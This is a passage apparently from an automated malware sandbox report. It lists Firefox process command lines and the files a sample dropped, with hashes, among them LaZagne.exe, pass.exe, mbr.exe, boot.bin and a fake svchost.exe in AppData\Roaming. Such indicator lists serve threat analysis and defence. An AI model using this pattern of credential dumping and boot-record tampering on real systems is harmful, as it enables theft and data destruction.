                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.3.334813878\729906253" -childID 2 -isForBrowser -prefsHandle 3492 -prefMapHandle 3488 -prefsLen 26480 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdec3432-9969-4119-ba84-c86c581629e4} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 3504 256ce676458 tab
                                                                  3⤵
                                                                    PID:2912
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.4.1056218112\495753192" -childID 3 -isForBrowser -prefsHandle 4284 -prefMapHandle 4216 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb052990-70ea-468a-90c0-4278cd69f397} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 4304 256cf6b6158 tab
                                                                    3⤵
                                                                      PID:1608
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.5.726332161\1275758279" -childID 4 -isForBrowser -prefsHandle 4788 -prefMapHandle 4784 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3bddc08-ff1f-4381-b9ab-82c5a65f1517} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 4792 256cc403858 tab
                                                                      3⤵
                                                                        PID:5456
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.7.1226247476\258293618" -childID 6 -isForBrowser -prefsHandle 5124 -prefMapHandle 5128 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {93a364de-9f79-4420-9496-f33e54f182d4} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 4808 256cc405f58 tab
                                                                        3⤵
                                                                          PID:5472
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.6.654536354\2105017117" -childID 5 -isForBrowser -prefsHandle 4928 -prefMapHandle 4932 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed6c5d82-54a6-4911-a3ce-ed5e32d21a72} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 4920 256cc405358 tab
                                                                          3⤵
                                                                            PID:5464

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        371B

                                                                        MD5

                                                                        3dcccc597b4800b47fc872700193cec7

                                                                        SHA1

                                                                        035e59da6b7f629376f3716f0e0a1f3f5ea0de98

                                                                        SHA256

                                                                        1d8c8ca1026165f9c0b0cc960638d2d95d87995aaddbd0067ae3facaac819ce9

                                                                        SHA512

                                                                        36bfc45dfbcde5b3fb20ed517eb3ae9c19c533e0b86f66db7b3d8dd50c0a72a7593f237f51865a559e648405a80eda77ba1ba32d2dabab5cf151569917973802

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        5KB

                                                                        MD5

                                                                        56a0a5b0cc111e3259e95ad8915f9f48

                                                                        SHA1

                                                                        13c40a230cdc4000881aec15f0c54415dedddf75

                                                                        SHA256

                                                                        1ba7812b9deb8c38c3d6d7cf4bf2a80f3bcd1613fdaf53920f0825cc33499604

                                                                        SHA512

                                                                        68b4300a9ab42e92df8dd84b9055c9128d31e0d13975b35d3ef88f9759ddda5196885f819b92b86b0763b406ba8b0034f19a601e7b7f9dafc437bc83a2c9c479

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        5KB

                                                                        MD5

                                                                        cce9da4e6b2825b2f07482691d388ab0

                                                                        SHA1

                                                                        e0745924ff49a1de03f2833a7be6768ce3b66c47

                                                                        SHA256

                                                                        70bd9a26fb8decfc37c99401c5f629aeebe3810b29084948e4398b6bcd05829a

                                                                        SHA512

                                                                        5b0908ac01dd7b1f353e1f5ffe5a44030839835ea91013ea8eb29eb4fdf5956caf48c265911c06c64a2b73e75705404e24997ade27644796f1eb4b4fa4cbaf04

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                        Filesize

                                                                        204KB

                                                                        MD5

                                                                        92dc84b94060eae6b3bda4bf63cc40b6

                                                                        SHA1

                                                                        24a98baeba55f383625715dcd6a6331127801a7b

                                                                        SHA256

                                                                        52682d1b39c2f23b6a1a0ed644c3e134a5c2789a5219bb97269a98ab9443c6de

                                                                        SHA512

                                                                        ca2a2e11e3b495cd695dfe6441b68b8048c81acd35f0ed6ca10daec33edf0ae6671ff5e7799a3487a0c38fb601e007800f946a018d0447f38d401c84a126f880

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

                                                                        Filesize

                                                                        2B

                                                                        MD5

                                                                        99914b932bd37a50b983c5e7c90ae93b

                                                                        SHA1

                                                                        bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                        SHA256

                                                                        44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                        SHA512

                                                                        27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcf0uwfs.default-release\activity-stream.discovery_stream.json.tmp

                                                                        Filesize

                                                                        21KB

                                                                        MD5

                                                                        6a419cf3f2fd22ac4290278494ed4dc9

                                                                        SHA1

                                                                        0c61ed30aae03a40aa15ddc3b552c592ae6ce56f

                                                                        SHA256

                                                                        4fa581b8ccae0f330bbda07e62de1965313487c46b7a897cd7027a6bb9154c6b

                                                                        SHA512

                                                                        fc8198e633b0b6e895d11b4419a0cec57cd3ffaa8605ab2724638381fa505e6e60513a15d450d0665fd7dab3080f532e69958c9d1673891907319d575baa73d5

                                                                      • C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

                                                                        Filesize

                                                                        685KB

                                                                        MD5

                                                                        081d9558bbb7adce142da153b2d5577a

                                                                        SHA1

                                                                        7d0ad03fbda1c24f883116b940717e596073ae96

                                                                        SHA256

                                                                        b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

                                                                        SHA512

                                                                        2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\Crypto\Cipher\_raw_cbc.pyd

                                                                        Filesize

                                                                        12KB

                                                                        MD5

                                                                        a1b78a3ce3165e90957880b8724d944f

                                                                        SHA1

                                                                        a69f63cc211e671a08daad7a66ed0b05f8736cc7

                                                                        SHA256

                                                                        84e071321e378054b6d3b56bbd66699e36554f637a44728b38b96a31199dfa69

                                                                        SHA512

                                                                        15847386652cbee378d0ff6aad0a3fe0d0c6c7f1939f764f86c665f3493b4bccaf98d7a29259e94ed197285d9365b9d6e697b010aff3370cf857b8cb4106d7d8

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\Crypto\Cipher\_raw_cfb.pyd

                                                                        Filesize

                                                                        13KB

                                                                        MD5

                                                                        0dca79c062f2f800132cf1748a8e147f

                                                                        SHA1

                                                                        91f525b8ca0c0db245c4d3fa4073541826e8fb89

                                                                        SHA256

                                                                        2a63e504c8aa4d291bbd8108f26eecde3dcd9bfba579ae80b777ff6dfec5e922

                                                                        SHA512

                                                                        a820299fba1d0952a00db78b92fb7d68d77c427418388cc67e3a37dc87b1895d9ae416cac32b859d11d21a07a8f4cef3bd26ebb06cc39f04ad5e60f8692c659b

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\Crypto\Cipher\_raw_ctr.pyd

                                                                        Filesize

                                                                        14KB

                                                                        MD5

                                                                        785f15dc9e505ed828356d978009ecce

                                                                        SHA1

                                                                        830e683b0e539309ecf0f1ed2c7f73dda2011563

                                                                        SHA256

                                                                        b2b68de1d7e5997eb0c8a44c9f2eb958de39b53db8d77a51a84f1d1b197b58b1

                                                                        SHA512

                                                                        16033b72be6d66ab3a44b0480eb245d853a100d13a1e820eff5b12ce0bb73e17d6e48b3e778d1b20d0c04fe1fb8a5723c02ed8af434ae64d0944f847796d98f2

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\Crypto\Cipher\_raw_ecb.pyd

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        aec314222600ade3d96b6dc33af380a6

                                                                        SHA1

                                                                        c6af3edadb09ea3a56048b57237c0a2dca33bee1

                                                                        SHA256

                                                                        ea96505b38d27c085544fb129f2b0e00df5020d323d7853e6a6a8645ac785304

                                                                        SHA512

                                                                        bbc00aa7fdf178bb6b2d86419c31967f2bc32d157aa7ee3ac308c28d8bf4823c1fafcde6c91651edc05c146e44d7e59e02a76283890652b27c52f509c3b9ef9a

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\Crypto\Cipher\_raw_ofb.pyd

                                                                        Filesize

                                                                        12KB

                                                                        MD5

                                                                        4ed6d4b1b100384d13f25dfa3737fb78

                                                                        SHA1

                                                                        852a2f76c853db02e65512af35f5b4b4a2346abd

                                                                        SHA256

                                                                        084e4b2da2180ad2a2e96e8804a6f2fc37bce6349eb8a5f6b182116b4d04bd82

                                                                        SHA512

                                                                        276201a9bcb9f88f4bbac0cd9e3ea2da83e0fb4854b1a0dd63cff2af08af3883be34af6f06ece32fad2fd4271a0a09a3b576f1ed78b8a227d13c04a07eaf0827

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\VCRUNTIME140.dll

                                                                        Filesize

                                                                        87KB

                                                                        MD5

                                                                        0e675d4a7a5b7ccd69013386793f68eb

                                                                        SHA1

                                                                        6e5821ddd8fea6681bda4448816f39984a33596b

                                                                        SHA256

                                                                        bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1

                                                                        SHA512

                                                                        cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\_bz2.pyd

                                                                        Filesize

                                                                        87KB

                                                                        MD5

                                                                        92075c2759ac8246953e6fa6323e43fe

                                                                        SHA1

                                                                        6818befe630c2656183ea7fe735db159804b7773

                                                                        SHA256

                                                                        e7af6119b56ddd47fd0a909710f7163d7ef4822405fc138d24e6ce9de7a5022f

                                                                        SHA512

                                                                        7f3a4409859695f53291c96dd487bca2649815bad5f4610c2c6f92777411d39210e293d962573a20dfe73ea15331de7e6c18b017ae1d6f226387eab1fc1f586c

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\_cffi_backend.cp37-win_amd64.pyd

                                                                        Filesize

                                                                        177KB

                                                                        MD5

                                                                        daccb97b9214bb1366ed40ad583679a2

                                                                        SHA1

                                                                        89554e638b62be5f388c9bdd35d9daf53a240e0c

                                                                        SHA256

                                                                        b714423d9cad42e67937531f2634001a870f8be2bf413eacfc9f73ef391a7915

                                                                        SHA512

                                                                        99fd5c80372d878f722e4bcb1b8c8c737600961d3a9dffc3e8277e024aaac8648c64825820e20da1ab9ad9180501218c6d796af1905d8845d41c6dbb4c6ebab0

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\_ctypes.pyd

                                                                        Filesize

                                                                        131KB

                                                                        MD5

                                                                        2787764fe3056f37c79a3fc79e620172

                                                                        SHA1

                                                                        a64d1a047ba644d0588dc4288b74925ed72e6ed4

                                                                        SHA256

                                                                        41c593c960f3f89b1e1629c6b7bd6171fe306168f816bef02027332a263de117

                                                                        SHA512

                                                                        1dc5bb470be558c643a3f68e23423697384bc547b1192cd398dff640e28f7df85563bc87643cdcde9b8b4f880f272e13a673a018ae251e100bd99790f993afa0

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\_hashlib.pyd

                                                                        Filesize

                                                                        38KB

                                                                        MD5

                                                                        7808b500fbfb17c968f10ee6d68461df

                                                                        SHA1

                                                                        2a8e54037e7d03d20244fefd8247cf218e1d668f

                                                                        SHA256

                                                                        e2701f4e4a7556adab7415e448070289ba4fe047227f48c3a049d7c3154aff0b

                                                                        SHA512

                                                                        b4239e792141bcf924f61bfd46033934337079b245f423b34820d36c6599ca35ab06bc525acfff4cafa75e31975fcd0409dedd203377d642fc5dc55ec2c1fa27

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\_lzma.pyd

                                                                        Filesize

                                                                        251KB

                                                                        MD5

                                                                        ab582419629183e1615b76fc5d2c7704

                                                                        SHA1

                                                                        b78ee7e725a417bef50cca47590950e970eae200

                                                                        SHA256

                                                                        5a45f7cd517ad396a042bc2767ae73221dc68f934e828a9433249924a371ee5e

                                                                        SHA512

                                                                        3f38441dd0b88b486dafaa1e15d07f0ee467a362c1603071a2fa79de770fa061ced25ca790f0d3139f31178c719cc82ac88601262e2a0ca809708dfa3f6f76ca

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\_queue.pyd

                                                                        Filesize

                                                                        27KB

                                                                        MD5

                                                                        a48af48dd880c11673469c1ade525558

                                                                        SHA1

                                                                        01e9bbcd7eccaa6d5033544e875c7c20f8812124

                                                                        SHA256

                                                                        a98e9f330eeaf40ef516237ab5bc1efac1fc49ed321a128be78dd3fb8733e0a4

                                                                        SHA512

                                                                        a535dadb79c1ca10506858226442d1d1fb00e5d6f99afa6b539e2506a6627a7bd624a7ee2bc61f55c974113de80fd7a95e6c18e9402736d32d5099077ca1b913

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\_socket.pyd

                                                                        Filesize

                                                                        74KB

                                                                        MD5

                                                                        10cd16bb63862536570c717ffc453da4

                                                                        SHA1

                                                                        b3ef50d7ac4652b5c35f1d86a0130fb43dd5a669

                                                                        SHA256

                                                                        e002a1bd6fba44681d557b64d439585dba9820226e1c3da5a62628bbaa930ae3

                                                                        SHA512

                                                                        55ee581c4005901661efaf9aad6ea39b2b2e265579539d464d62e4209638567b3b9fdd945d0bed0a1047f977d374a5707a970c621ca289077e2d6c5aeca491b1

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\_sqlite3.pyd

                                                                        Filesize

                                                                        84KB

                                                                        MD5

                                                                        244d92824ef54b139ecd4f2b58a5d9d5

                                                                        SHA1

                                                                        ff5696f6e3dc42e578a580299ac53d8c5e11d917

                                                                        SHA256

                                                                        fd55c3e3b2863425050619b8d42fe19cf06c1c8e2e11f7076e1f4422663e6851

                                                                        SHA512

                                                                        10fba938064bca2b9163d6c0d0a0361d0ebd896e32346cade3e4a439475c223ced59ac8f9c51727d5556149b14990ab62ee6769c35cf067aaac5d63dd5d4688f

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\base_library.zip

                                                                        Filesize

                                                                        762KB

                                                                        MD5

                                                                        4dbdcd4c1d91ebb19d0520ad80f35d78

                                                                        SHA1

                                                                        1a2e0de2cb1c5be36d3e7ad691bf6b27436dbdb7

                                                                        SHA256

                                                                        c74288cc76f67f9f3be2ce61b3c4b1df78b082f4d55dc4dd7b68f6a4803ea47e

                                                                        SHA512

                                                                        8a298985628c895a67adf9538e92ff7527219163dc1c491f5c250bd36532d66f9d9530c04778d535535eeb0f22dcb4c55d22ab3459b6e827d614ca1e7c647031

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\lazagne.exe.manifest

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        6fe7232e13f5f8307c037b54fe0dcc10

                                                                        SHA1

                                                                        510075454d9179d1c6669df67f126213aabcb99f

                                                                        SHA256

                                                                        4996109560a79774034a05b398d64b1b441c49f0f03682c4683554c59dd47e5c

                                                                        SHA512

                                                                        8893febd884f6411025ff9df7d0ef2dbc756baa93903423e805b5e981273838567f2ea60d072d4d98fe9b2f2c25a85800522cebc5e832a3256d4c10605085725

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\libcrypto-1_1.dll

                                                                        Filesize

                                                                        3.2MB

                                                                        MD5

                                                                        bf83f8ad60cb9db462ce62c73208a30d

                                                                        SHA1

                                                                        f1bc7dbc1e5b00426a51878719196d78981674c4

                                                                        SHA256

                                                                        012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d

                                                                        SHA512

                                                                        ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\pyexpat.pyd

                                                                        Filesize

                                                                        194KB

                                                                        MD5

                                                                        02d615171b805cc573b28e17611f663f

                                                                        SHA1

                                                                        2e63b78316b4eae6ee1c25f1f10fbbb84ecef054

                                                                        SHA256

                                                                        e60b5cbdf7480db1fc829e05ce45703d43d5ba25fdf7fba21cca1d38b1f3b3a4

                                                                        SHA512

                                                                        b61cd3d16d1a192016a50342ae71fee8f764c4c156e275a320f74cc4ec65755c91c022231d09a76b59d6225960f5a930f1887003b1d6984beeb5a9648b045427

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\python37.dll

                                                                        Filesize

                                                                        3.6MB

                                                                        MD5

                                                                        c4e99d7375888d873d2478769a8d844c

                                                                        SHA1

                                                                        881e42ad9b7da068ee7a6d133484f9d39519ca7e

                                                                        SHA256

                                                                        12f26beb439ddf8d56e7544b06a0675d5da6670c02f8f9cede7aad1de71eb116

                                                                        SHA512

                                                                        a5b79a919f15cda2c295c8da923ffe5dd30408376e459669e4e376b9d4d504d43671518d7085352bb90c4ce4efc6d81c91ac6cedbdaa896f916d80f7346a695b

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\select.pyd

                                                                        Filesize

                                                                        26KB

                                                                        MD5

                                                                        39b7c056bca546778690b9922315f9ff

                                                                        SHA1

                                                                        5f62169c8de1f72db601d30b37d157478723859b

                                                                        SHA256

                                                                        9514b4c40c35396b1952a8acf805e993a3875b37370f44ef36ed33c7151412ef

                                                                        SHA512

                                                                        229538131d83299ea90652818c99972c1ee692c070e7fea9599420c99dd8ae75fb2367e9509aad23984fe0a8d21221a59bd57493b5cd1d6c7391c3c55d714e94

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\sqlite3.dll

                                                                        Filesize

                                                                        1.2MB

                                                                        MD5

                                                                        8e75a7cf495ee6c1381b1f4a7979f736

                                                                        SHA1

                                                                        b6d250bf8d3b04f5666d2eedb7c6eb96614a0081

                                                                        SHA256

                                                                        48a58913429af487390f4bf7bb1c6790a0a9980ecc6b7a78238cd685f8a2baad

                                                                        SHA512

                                                                        78c32021a6c3af8a85acaa20481db9b49cbeccc755123d31b50a207cd5925833e454b3cdfc06b51e4b25f49b27e02693a067933f4d697f830cb3b985eeaf13a2

                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI49042\ucrtbase.dll

                                                                        Filesize

                                                                        970KB

                                                                        MD5

                                                                        aad2e99881765464c9ad9ccdbe78f0e0

                                                                        SHA1

                                                                        8634ce21a2683674210e836822fda448262e2e16

                                                                        SHA256

                                                                        e6287f7ba5892c99da70e9785d320a665809ca8e657a64b9fef1e8afcfb6a2f9

                                                                        SHA512

                                                                        68d2e898cdd73a3ad41ef3db7a149588a82629ac0628c07606f009bd6a92a62f9816c995b1794c8a957a4f3c55a72fcab17a400a2f55016a0ee8d773a172d002

                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5b2atom.jia.ps1

                                                                        Filesize

                                                                        1B

                                                                        MD5

                                                                        c4ca4238a0b923820dcc509a6f75849b

                                                                        SHA1

                                                                        356a192b7913b04c54574d18c28d46e6395428ab

                                                                        SHA256

                                                                        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                        SHA512

                                                                        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                      • C:\Users\Admin\AppData\Roaming\LaZagne.exe

                                                                        Filesize

                                                                        11.3MB

                                                                        MD5

                                                                        282df7bcb720a5b6f409caf9ccda2f75

                                                                        SHA1

                                                                        0e62d10ff194e84ed8c6bd71620f56ef9e557072

                                                                        SHA256

                                                                        3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05

                                                                        SHA512

                                                                        74bbcefb87c037ec93312f67b739c2486258d83e0fb7628352a1dd482c0277a82073427856c0848cda451b7322faab0ae2e6878501c2867827ce6bd9798f3229

                                                                      • C:\Users\Admin\AppData\Roaming\LaZagne.exe

                                                                        Filesize

                                                                        11.3MB

                                                                        MD5

                                                                        282df7bcb720a5b6f409caf9ccda2f75

                                                                        SHA1

                                                                        0e62d10ff194e84ed8c6bd71620f56ef9e557072

                                                                        SHA256

                                                                        3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05

                                                                        SHA512

                                                                        74bbcefb87c037ec93312f67b739c2486258d83e0fb7628352a1dd482c0277a82073427856c0848cda451b7322faab0ae2e6878501c2867827ce6bd9798f3229

                                                                      • C:\Users\Admin\AppData\Roaming\LaZagne.exe

                                                                        Filesize

                                                                        11.3MB

                                                                        MD5

                                                                        282df7bcb720a5b6f409caf9ccda2f75

                                                                        SHA1

                                                                        0e62d10ff194e84ed8c6bd71620f56ef9e557072

                                                                        SHA256

                                                                        3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05

                                                                        SHA512

                                                                        74bbcefb87c037ec93312f67b739c2486258d83e0fb7628352a1dd482c0277a82073427856c0848cda451b7322faab0ae2e6878501c2867827ce6bd9798f3229

                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcf0uwfs.default-release\prefs.js

                                                                        Filesize

                                                                        6KB

                                                                        MD5

                                                                        d7135985bb565975025b1b8a035c8ccc

                                                                        SHA1

                                                                        09b5d66c72d5e88ee3e428425db0ef215faab440

                                                                        SHA256

                                                                        05e82ce9c815df30f31a269bc2ce53e5ef3ad589b4a29c1405d4c1a88369600a

                                                                        SHA512

                                                                        0bc1ae066b0d244b06eb961cfc6ca3f3408273c24e0d73f020675afe87a331e6399d31ca0ab2b59ad5a32c4a16e9d18173746bef9a4b1df5c3946881dcbd8ead

                                                                      • C:\Users\Admin\AppData\Roaming\VCRUNTIME140D.dll

                                                                        Filesize

                                                                        111KB

                                                                        MD5

                                                                        b59b0f6193bcc7e78a3b2fc730196be3

                                                                        SHA1

                                                                        045469fec2df2a9c75b550984a0ed32db2e9f846

                                                                        SHA256

                                                                        003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

                                                                        SHA512

                                                                        73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

                                                                      • C:\Users\Admin\AppData\Roaming\boot.bin

                                                                        Filesize

                                                                        512B

                                                                        MD5

                                                                        6c8c10b2456ae1acf59183aaae034c96

                                                                        SHA1

                                                                        3ea5d66f7f52acd971e6533c510f74ed85a02872

                                                                        SHA256

                                                                        24ef74a80bd84679b8e08c12b4901078e830b62aeb0b2f8172f64c44117bcaf1

                                                                        SHA512

                                                                        26354cb2f6f9f9fdb1f72e015a5618a7daead5d27aaa415a947a0f8a7e7f5406bc422ba01cb5f58baffef9537f4356efb947dabdf76e4ec61a33e2c51d0177c8

                                                                      • C:\Users\Admin\AppData\Roaming\discord.exe

                                                                        Filesize

                                                                        3.2MB

                                                                        MD5

                                                                        365d0de92d3b9fea30206660086816ec

                                                                        SHA1

                                                                        e0cb057eb172390bd7707bcc24937a87330be165

                                                                        SHA256

                                                                        cc2fa903be93db39e42efcd92e588b15c763197e09b15523925fd99e999c73f4

                                                                        SHA512

                                                                        a9834d2b1bd38fbcca3dcf0148bda4630936259955884e6954b0c08aad58b4487b93f5e24d8a272df5c107f36c3a2e224744c9f80b179baaf33fc77e8b67a9fb

                                                                      • C:\Users\Admin\AppData\Roaming\lm.exe

                                                                        Filesize

                                                                        39KB

                                                                        MD5

                                                                        86e3192ad129a388e4f0ac864e84df78

                                                                        SHA1

                                                                        70a2b1422b583c2d768a6f816905bc85687ced52

                                                                        SHA256

                                                                        4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

                                                                        SHA512

                                                                        f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

                                                                      • C:\Users\Admin\AppData\Roaming\lm.exe

                                                                        Filesize

                                                                        39KB

                                                                        MD5

                                                                        86e3192ad129a388e4f0ac864e84df78

                                                                        SHA1

                                                                        70a2b1422b583c2d768a6f816905bc85687ced52

                                                                        SHA256

                                                                        4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

                                                                        SHA512

                                                                        f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

                                                                      • C:\Users\Admin\AppData\Roaming\mbr.exe

                                                                        Filesize

                                                                        101KB

                                                                        MD5

                                                                        00e306f18b8cc56f347f34a7ebaf7f9f

                                                                        SHA1

                                                                        2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

                                                                        SHA256

                                                                        ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

                                                                        SHA512

                                                                        2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

                                                                      • C:\Users\Admin\AppData\Roaming\mbr.exe

                                                                        Filesize

                                                                        101KB

                                                                        MD5

                                                                        00e306f18b8cc56f347f34a7ebaf7f9f

                                                                        SHA1

                                                                        2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

                                                                        SHA256

                                                                        ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

                                                                        SHA512

                                                                        2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

                                                                      • C:\Users\Admin\AppData\Roaming\pass.exe

                                                                        Filesize

                                                                        15.1MB

                                                                        MD5

                                                                        91369839fbea332449d63eaf1fd297f2

                                                                        SHA1

                                                                        84cac2ed5fcd81966fd65b3b7b22d83aaa2d7df5

                                                                        SHA256

                                                                        b336f8cbefce0c9a20f346a258c63ff55c75e74ff39802a194439af1556fba97

                                                                        SHA512

                                                                        84804012506ac0c8caeb3cbb7c30645b7f8ac7f1aa48041354f3349e401922dfdba6fe21f4f3963da409fcc0020d0c53ff5e5843dd0511db8165790b5984ba98

                                                                      • C:\Users\Admin\AppData\Roaming\server.exe

                                                                        Filesize

                                                                        3.1MB

                                                                        MD5

                                                                        c8db5668140e835a48ca1ef55201f104

                                                                        SHA1

                                                                        b23e3dd6326074e2aff13eaae0fb71910e04968c

                                                                        SHA256

                                                                        d452df4b9c55782a21a75c0870c0b0a920c843668d6e1a335ccaeeeb7057dd9e

                                                                        SHA512

                                                                        f1472bd66e74af132ec1b0872e00f0dc6cf0215db8b21ec4bf7c935a69ffe43347bba2bc605bab7916e72620395f4aae5dd325bf34b5c57dd6df6b4e5e0b1d90

                                                                      • C:\Users\Admin\AppData\Roaming\server.exe

                                                                        Filesize

                                                                        3.1MB

                                                                        MD5

                                                                        c8db5668140e835a48ca1ef55201f104

                                                                        SHA1

                                                                        b23e3dd6326074e2aff13eaae0fb71910e04968c

                                                                        SHA256

                                                                        d452df4b9c55782a21a75c0870c0b0a920c843668d6e1a335ccaeeeb7057dd9e

                                                                        SHA512

                                                                        f1472bd66e74af132ec1b0872e00f0dc6cf0215db8b21ec4bf7c935a69ffe43347bba2bc605bab7916e72620395f4aae5dd325bf34b5c57dd6df6b4e5e0b1d90

                                                                      • C:\Users\Admin\AppData\Roaming\settings.bat

                                                                        Filesize

                                                                        67B

                                                                        MD5

                                                                        a204d9e5059a5449af7af765d371d6ea

                                                                        SHA1

                                                                        cfc6f78545bdc6a1c82491500f1bacfb38bef28c

                                                                        SHA256

                                                                        d39e88bebdb89ec08c55d320622784e0e131b7c75bd810305daa313c2baa3d26

                                                                        SHA512

                                                                        d46f0f2282f98116b6e365dc65538a77a39495b7bdd8c910a98226d30bac79026e7c9d6402ed81023a31b7ff8cea316362d8fa909e9edd50b9c6e711d39ddc92

                                                                      • C:\Users\Admin\AppData\Roaming\svchost.exe

                                                                        Filesize

                                                                        41KB

                                                                        MD5

                                                                        84177654d8bbd32fe8132265e7a598ec

